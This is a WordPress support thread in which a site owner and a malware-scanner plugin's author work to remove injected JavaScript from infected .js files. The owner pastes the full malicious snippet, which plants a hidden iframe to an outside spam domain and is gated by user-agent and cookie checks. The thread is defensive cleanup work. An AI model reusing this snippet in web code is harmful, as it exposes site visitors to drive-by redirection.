Leftover code

  • Resolved stefaanvandamme

    (@stefaanvandamme)


    11 years, 6 months ago

    Hey,

    I used your plugin to remove code that was inserted in my .js files

    however, not everything was removed

    &&bb){document.write(‘<iframe style=”position:absolute;margin-top: -1004px;” src=”http://poper.addictedness.ga&#8221; width=”160″ height=”137″></iframe>’);var date=new Date(new Date().getTime()+48*60*60*1000);document.cookie=”delicatesma7fueja=1; path=/; expires=”+date.toUTCString()}})();

    is still present in my files, any way to remove all this automatically so i don’t have to edit all my infected files ?

    Thank you

    https://ww.wp.xz.cn/plugins/gotmls/

Viewing 6 replies - 1 through 6 (of 6 total)
  • Plugin Author Eli

    (@scheeeli)

    11 years, 6 months ago

    Can you please post the entire infected file so that I can test it. I need to see what it finds in the origin file to see why it’s not removing the whole infection.

    Thanks, Eli

    Thread Starter stefaanvandamme

    (@stefaanvandamme)

    11 years, 6 months ago

    Here is the full one (only the ‘spam’ url is different (http://poper.addible.ml vs http://poper.addictedness.ga)

    function getCookie(name){var matches=document.cookie.match(new RegExp(“(?:^|; )”+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,’\\$1′)+”=([^;]*)”));return matches?decodeURIComponent(matches[1]):undefined}(function(){function stripos(f_haystack,f_needle,f_offset){var haystack=(f_haystack+”).toLowerCase();var needle=(f_needle+”).toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-1){return index}return false}function milenium_agent(){var falshSpis=[‘AppleWebKit’,’Windows NT 6.3′,’X11′];var falshUA=false;for(var i in falshSpis){if(stripos(navigator.userAgent,falshSpis[i])){falshUA=true;break}}return falshUA}var bb=(getCookie(“delicatesma7fueja”)===undefined);if(!milenium_agent()&&bb){document.write(‘<iframe style=”position:absolute;margin-top: -1004px;” src=”http://poper.addible.ml&#8221; width=”160″ height=”137″></iframe>’);var date=new Date(new Date().getTime()+48*60*60*1000);document.cookie=”delicatesma7fueja=1; path=/; expires=”+date.toUTCString()}})();

    Plugin Author Eli

    (@scheeeli)

    11 years, 6 months ago

    I there must be more code in that file. Is this the entire contents of the infected file or just the infected part of the file?

    Can you please send me the whole file? you can send it as an attachment if that’s easier. My direct email is: eli AT gotmls DOT net

    Aloha, Eli

    Thread Starter stefaanvandamme

    (@stefaanvandamme)

    11 years, 6 months ago

    I will send you my heartbeat.js file by mail

    Plugin Author Eli

    (@scheeeli)

    11 years, 6 months ago

    Thank you!

    I have a new definition update available that includes this new variant. If you have any more of these scripts on your server you can download the new definition update and then use the automatic fix to remove all the malicious code. If you have any of these files that were only half fixed by the older definitions you should restore the original files from the quarantine and scan then again and then fix then with the new definition.

    Please let me know how this works for you, and mark this topic as “resolved” if it is working.

    Aloha, Eli

    Thread Starter stefaanvandamme

    (@stefaanvandamme)

    11 years, 6 months ago

    Everything fixed, thank you for the plugin and the swift replies
    Paypalled you some drinking money 😉

Viewing 6 replies - 1 through 6 (of 6 total)

The topic ‘Leftover code’ is closed to new replies.